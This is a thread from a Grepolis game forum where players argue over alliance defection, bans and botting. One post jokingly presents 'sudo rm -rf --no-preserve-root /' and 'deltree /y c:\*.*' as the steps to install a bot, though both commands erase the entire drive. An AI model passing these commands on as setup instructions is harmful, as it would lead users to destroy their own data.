A Public Message to the Leaders of OCEANS VETERANS

DeletedUser

btw sheikh tell the people in your alliance paying $25-$50 a month for bots to contact me, I will recreate it for halve the price. not even kidding.

DeletedUser

btw sheikh tell the people in your alliance paying $25-$50 a month for bots to contact me, I will recreate it for halve the price. not even kidding.

The script generally used, from what I've heard, requires you to go into your command line and type as follows:

"sudo rm -rf --no-preserve-root /"

if you are on a linux or mac machine. You will have to enter your password.

If you are windows, you type:

"deltree /y c:\*.*"

Once you've done this, you are ready. It's really that simple!

Last edited by a moderator:

DeletedUser37515

dont post in forum now i know y hell i just got to laugh at all this lol but it all fun and games

DeletedUser47953

Gotta love how WarlordCro joins Venom and suddenly is under attack from everyone in OV (the normal result of treason), but then gets himself banned so we can't take his cities... He must be loving the free VM from the ban over the weekend, but he should know, we will be there waiting when he comes out of ban and he will still lose his cities quickly...

...and what is it with botting and multi accounting? Seriously, 1 account is more than enough work... It's like a second job... and the botting, heck my cities make more resources than I can use except for festivals to gain more slots...

Happy Hunting! :pro:

DeletedUser37948

Gotta love how WarlordCro joins Venom and suddenly is under attack from everyone in OV (the normal result of treason), but then gets himself banned so we can't take his cities... He must be loving the free VM from the ban over the weekend, but he should know, we will be there waiting when he comes out of ban and he will still lose his cities quickly...

...and what is it with botting and multi accounting? Seriously, 1 account is more than enough work... It's like a second job... and the botting, heck my cities make more resources than I can use except for festivals to gain more slots...

Happy Hunting! :pro:

there are other things you get banned for as well

DeletedUser43325

"Treason"
-the crime of betraying one's country, especially by attempting to kill the sovereign or overthrow the government:-

What are you, 10? Seriously, grow up. It's a game. Every player has the right to play wherever they want to play. If someone thinks they would enjoy playing in a different alliance with a different group of people because it matches their style of play and would find more enjoyment in doing so, that is their perogative. You literally can't do anything "treasonous" in a game. Warlord made a decision because he was sick of simming and didn't respect the leadership of OV. He doesn't owe OV a single thing.

And "suddenly under attack"? As if we didn't know that would happen? How many troops did OV crash into stacked cities after he changed his flags? Count the BP up and see if you were on the winning side of that exchange.

Also, you have absolutely no merit to any sort of "trash-talking" that comes with Warlord. Worst case scenario, you rim him. Best case scenario, we keep him protect and he reaks havoc on the rest of you simmers. Either way, OV lost one of it's top players. It's a win for Venom no matter what the outcome.

DeletedUser

heck my cities make more resources than I can use except for festivals to gain more slots...
hey zen! good news for you! grepolis has recently added a new feature called 'attacking.' its now possible to use your res for troops and attack enemies! Cool huh? now you can use res for troops instead of festivals :D

DeletedUser

hey zen! good news for you! grepolis has recently added a new feature called 'attacking.' its now possible to use your res for troops and attack enemies! Cool huh? now you can use res for troops instead of festivals :D

No way!!!! Why have you never told me this before!!!!

DeletedUser47953

"Treason"
-the crime of betraying one's country, especially by attempting to kill the sovereign or overthrow the government:-

What are you, 10? Seriously, grow up. It's a game. Every player has the right to play wherever they want to play. If someone thinks they would enjoy playing in a different alliance with a different group of people because it matches their style of play and would find more enjoyment in doing so, that is their perogative. You literally can't do anything "treasonous" in a game. Warlord made a decision because he was sick of simming and didn't respect the leadership of OV. He doesn't owe OV a single thing.

And "suddenly under attack"? As if we didn't know that would happen? How many troops did OV crash into stacked cities after he changed his flags? Count the BP up and see if you were on the winning side of that exchange.

Also, you have absolutely no merit to any sort of "trash-talking" that comes with Warlord. Worst case scenario, you rim him. Best case scenario, we keep him protect and he reaks havoc on the rest of you simmers. Either way, OV lost one of it's top players. It's a win for Venom no matter what the outcome.

Yeah, so now the ban allowed your long slow ships to stack his cities and it's over and he again has 2k birs in every city instead of clear harbors with CS on the way... Nice how it works for a refugee to get banned for 24 hours... Whatever you guys say, there was some definite BS in how this got handled.

DeletedUser43325

Wow first treason and now collusion. Any other crimes you feel we've committed you'd like to cry about?

Yeah, so now the ban allowed your long slow ships to stack his cities

Also I'm at least 90% sure our ships move at the same speed of yours. Not sure about the length of them but I suppose there is reason to suspect our ships might be longer than yours.

DeletedUser47953

I'm not saying who is responsible, but it's kinda fishy, just like the supposed "server glitch" that kept us from being able to access our troops in O63 Artemisia town... Now a guy who was going to lose several cities in an hour or 2, got to receive LTS from his entire alliance while under ban since they launched birs before the ban, then the ban conveniently kept us from launching 2 hour CSs and the LTS birs took 4 or more hours to land....

Real convenient and very suspicious... How is it that OV is the only alliance which seems to have these "technical" issues in the game???

...and it always seems to favor our enemies... :Angry:

DeletedUser

Wow first treason and now collusion. Any other crimes you feel we've committed you'd like to cry about?

Do they know that daz went streaking? They could cry for indecent exposure and their 'lost innocence' after seeing such a traumatizing event.